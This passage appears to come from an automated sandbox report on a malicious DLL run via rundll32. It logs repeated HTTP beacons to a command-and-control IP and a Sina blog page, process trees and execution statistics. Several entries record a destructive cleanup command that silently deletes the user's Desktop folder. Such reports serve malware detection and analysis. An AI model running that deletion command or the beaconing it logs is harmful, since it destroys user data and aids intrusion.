                                                                                                                                          Dec 19, 2024 15:36:48.728028059 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:50.547456026 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          143192.168.2.556890107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:52.834722996 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          144192.168.2.556892116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:52.836296082 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:54.668972015 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          145192.168.2.556893107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:52.836488008 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          146192.168.2.559231107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:56.870379925 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          147192.168.2.559313107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:56.993143082 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          148192.168.2.559314116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:56.995450974 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:58.732543945 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:58 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          149192.168.2.561952107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:37:00.998501062 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.550003116.133.8.924435400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-19 14:34:05 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.550097116.133.8.924435400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-19 14:34:13 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.550187116.133.8.924435400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-19 14:34:22 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.550283116.133.8.924435400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-19 14:34:30 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.551237116.133.8.924435400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-19 14:35:06 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.551452116.133.8.924435400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-19 14:35:10 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll"
                                                                                                                                          Imagebase:0x120000
                                                                                                                                          File size:126'464 bytes
                                                                                                                                          MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:09:33:17
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:09:33:20
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:09:33:20
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680
                                                                                                                                          Imagebase:0x170000
                                                                                                                                          File size:483'680 bytes
                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:21
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 668
                                                                                                                                          Imagebase:0x170000
                                                                                                                                          File size:483'680 bytes
                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:25
                                                                                                                                          Start time:09:33:50
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:26
                                                                                                                                          Start time:09:33:51
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:27
                                                                                                                                          Start time:09:33:51
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:28
                                                                                                                                          Start time:09:33:51
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:29
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:30
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:31
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:32
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:4.5%
                                                                                                                                            Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                            Signature Coverage:1.2%
                                                                                                                                            Total number of Nodes:251
                                                                                                                                            Total number of Limit Nodes:11
